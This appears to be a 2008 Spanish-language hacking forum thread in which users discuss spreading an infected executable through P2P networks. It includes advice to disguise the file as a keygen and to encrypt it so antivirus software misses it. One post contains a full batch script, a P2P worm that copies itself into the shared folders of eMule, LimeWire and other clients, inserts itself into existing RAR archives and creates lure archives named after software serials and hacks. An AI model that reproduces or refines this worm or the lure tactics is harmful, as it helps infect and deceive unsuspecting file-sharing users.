Páginas: [1] 
|
 |
|
 Autor
|
Tema: Propagación por P2P [Duda] (Leído 469 veces)
|
napster08
 Desconectado
Mensajes: 14
|
Buenas, tengo un problema que me ronda por la cabeza al cual no encuentro respuesta. intentare ser lo mas claro posible.
He buscado y leído bastante sobre propagación p2p de cualquier archivo, hay mucha información por el foro, pero concretamente no he encontrado nada sobre el software en cuestión, es decir cuando yo meto mi archivo infectado en la carpeta compartida del x programa para compartir el archivo infectado.
Y me encuentro con 2 problemas.
Mi problema numero uno es que automáticamente el programa p2p, llámese emule, ares o cualquier otro, automáticamente me reconoce el archivo como software por tener una extensión exe, anteriormente he unido el server con una canción por ejemplo, pero no consigo quitarle la extensión de exe de aplicación, por ese motivo el programa siempre me lo reconoce como software.
Duda nº1
-¿Existe algún modo de dejar el archivo con extensión .mp3 por ejemplo y que se siga ejecutando el archivo infectado?
Duda nº2
-¿Que posibilidades existen de que algún usuario encuentre mi archivo infectado compartido?
Si alguien cree que puede responder estas 2 preguntas le estaré eternamente agradecido, de todas maneras seguiré investigando el tema.
Gracias.
|
|
|
|
|
En línea
|
|
|
|
abcdef123
Desconectado
Mensajes: 68
|
Te voy a contestar antes de que te borren el post o te manden a buscar por google o algo parecido
Duda nº1
Hay un metodo pero para que funcione siempre tienen que ejecutar un exe
Por lo tanto NO
Duda nº2
-¿Que posibilidades existen de que algún usuario encuentre mi archivo infectado compartido?
Y a esta pregunta pues no se si te refieres a que se lo baje mas gente si es a eso pues le pones el nombre de keygen y el nombre de algún programa solicitado y listo
Espero haberte ayudado aunq yo no soy ningún experto
|
|
|
|
|
En línea
|
|
|
|
|
Man-In-the-Middle
|
La unica forma de que puedas mandar un mp3, es que sea creado con un tool que explote alguna vulnerabilidad permitiendo ejecucion remota(drooper)or webdownloader, pues esas vulnerabilidades son parchadas casi en el acto, a menos que sea un o-day, no publicado pero lo dudo mucho.
Saludos
|
|
|
|
|
En línea
|
|
|
|
Freeze.
Desconectado
Mensajes: 2.446
FireSoft
|
Ya que leo este ultimo comentario, digo lo siguiente: Me he descargado varias "canciones" y cuando las abro intentan reproducir Play_Mp3.exe  ¿Porque sera eso? |
|
|
|
|
En línea
|
Un nuevo CMS, pruebalo:
|
|
|
napster08
Desconectado
Mensajes: 14
|
Te voy a contestar antes de que te borren el post o te manden a buscar por google o algo parecido
Duda nº1
Hay un metodo pero para que funcione siempre tienen que ejecutar un exe
Por lo tanto NO
Duda nº2
-¿Que posibilidades existen de que algún usuario encuentre mi archivo infectado compartido?
Y a esta pregunta pues no se si te refieres a que se lo baje mas gente si es a eso pues le pones el nombre de keygen y el nombre de algún programa solicitado y listo
Espero haberte ayudado aunq yo no soy ningún experto
Gracias por tu respuesta pero no creo que incumpla ninguna norma del foro para que se proceda a borrar el post. La unica forma de que puedas mandar un mp3, es que sea creado con un tool que explote alguna vulnerabilidad permitiendo ejecucion remota(drooper)or webdownloader, pues esas vulnerabilidades son parchadas casi en el acto, a menos que sea un o-day, no publicado pero lo dudo mucho.
Saludos
Excelente respuesta, por el momento me olvidare logicamente de encontrar un 0-day jeje, pero seguire investigando el tema. Gracias. Casualmente he encontrado un codigo en batch basado en el de el fantastico hendrix, pero tengo algunos problemas para su configuración, paso a detallarlo. @echo off
del %windir%\t.rar
type %0>op.bat
set o="%systemdrive%%~p0op.bat"
cd "%systemdrive%%~p0"
echo eMule\Incoming\ > %windir%\yer.t
echo Shareaza\Downloads\ >> %windir%\yer.t
echo BearShare\Shared\ >> %windir%\yer.t
echo EDONKEY2000\incoming\ >> %windir%\yer.t
echo LimeWire\Shared\ >> %windir%\yer.t
echo Path_msn_Emoticonos > %windir%\jer.t
echo sms_gratis >> %windir%\jer.t
echo polifonicos_free >> %windir%\jer.t
echo Microsoft_Office_2007_all_serials >> %windir%\jer.t
echo Windows_Vista_activation_tool >> %windir%\jer.t
echo Windows_Vista_all_serials >> %windir%\jer.t
echo MSN_hack_codes >> %windir%\jer.t
set rc=1
set r="%programfiles%\WINRAR\WinRAR.exe"
%r% a %windir%\t.rar %o%
if not %errorlevel%==9009 set rc=0
goto fr
:fr2
set uno=%1
for /F "tokens=* delims=" %%g in (%windir%\jer.t) do (
if %rc%==0 (
@copy /y %o% "%%g.bat"
cls
ping -n 2 localhost > nul
%r% a "%%g.rar" "%%g.bat"
)
)
goto :EOF
:fr
for /F "tokens=* delims=" %%a in (%windir%\yer.t) do (
if exist "%programfiles%\%%a" (
cd "%programfiles%\%%a"
for %%e in (*.rar) do (
@copy /y %o% "%%~ne.bat"
cls
ping -n 2 localhost > nul
%r% a "%%e" "%%~ne.bat"
)
call :fr2 %%a
)
)
pause
cd %windir%
del *.t
cd "%systemdrive%%~p0"
del op.bat
exit Para su funcionamiento supongo que habra que modificar la ruta de windir con el archivo infectado, si alguien conoce la forma de ejecutarlo correctamente y puede explicar un poco el codigo se lo agradezco. |
|
|
|
« Última modificación: 15 Mayo 2008, 00:42 por napster08 »
|
En línea
|
|
|
|
fernacho
Desconectado
Mensajes: 28
Fer el Newbie
|
Yo he visto ese código, para que se copie en una serie de archivos de un P2P, si es util, pero, habrá necesidad de encryptar el servidor y para que ningun av lo detecte.
|
|
|
|
|
En línea
|
Deseando aprender un poco mas y mas...
|
|
|
|
Páginas: [1] 
|
|
|
 |
